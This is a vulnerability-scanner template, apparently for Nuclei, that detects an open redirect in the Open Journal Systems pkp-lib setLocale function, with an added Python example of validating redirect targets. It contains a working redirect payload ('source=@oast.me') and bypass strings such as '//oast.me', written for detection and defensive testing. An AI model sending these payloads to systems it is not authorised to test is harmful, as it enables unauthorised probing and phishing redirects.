Vulnerability Description
Public Knowledge Project pkp-lib is vulnerable to Open redirect due to a lack of input sanitization in the setLocale function.
id: pkp-lib-open-redirect

info:
  name: Open Journal Systems pkp-lib - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    Public Knowledge Project pkp-lib is vulnerable to Open redirect due to a lack of input sanitization in the setLocale function.
  reference:
    - https://github.com/pkp/pkp-lib/issues/7575
  classification:
    cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: public_knowledge_project
    product: open_journal_systems
    fofa-query: body="pkp-lib"
  tags: pkp,ojs,open-journal-system,pkp-lib,redirect,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/index/user/setLocale/NEW_LOCALE?source=@oast.me"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*){{Hostname}}@?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$'
# digest: 4b0a00483046022100cfbe05c4773a175d3ff4fab8c3d78d5ea39deeadfe6a31b6c764c15288c56a22022100a09f24027d57e14b8d1f8ac53ab368175541f2297ecc5a47d2030eda1c9d0b54:922c64590222798bb761d5b6d8e72950
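
The matcher above looks for a `Location` header in which the site's own hostname is followed by `@` and another host, which turns the hostname into URL userinfo. The following added example (not part of the template and not pkp-lib's own fix) shows that effect and one way to validate a `source` value before redirecting. It assumes the application appends `source` to its base URL; `journal.example` and all function names are constructed for illustration.

```python
from typing import Optional
from urllib.parse import urlsplit


def effective_host(base_url: str, source: str) -> Optional[str]:
    """Host a browser contacts if redirected to base_url + source.

    Assumption: the application concatenates the two strings unchanged.
    """
    return urlsplit(base_url + source).hostname


def is_local_source(source: str) -> bool:
    """Accept only same-site absolute paths such as /index.php/index/about."""
    # Must start with exactly one slash: rejects "@host" and "//host".
    if not source.startswith("/") or source.startswith("//"):
        return False
    # Browsers treat "\" like "/", so "/\host" can act as "//host".
    # Control characters are rejected to keep the header value intact.
    if "\\" in source or any(ord(c) < 0x20 or ord(c) == 0x7F for c in source):
        return False
    parts = urlsplit(source)
    return parts.scheme == "" and parts.netloc == ""


def safe_redirect_target(base_url: str, source: str, fallback: str = "/") -> str:
    """Build the Location value, replacing any non-local source with fallback."""
    path = source if is_local_source(source) else fallback
    return base_url.rstrip("/") + path


if __name__ == "__main__":
    base = "https://journal.example"  # constructed sample host
    for src in ["@oast.me", "//oast.me", "/\\oast.me", "/index.php/index/about"]:
        print(f"{src!r:28} unvalidated host={effective_host(base, src)!r:20} "
              f"validated={safe_redirect_target(base, src)}")
```
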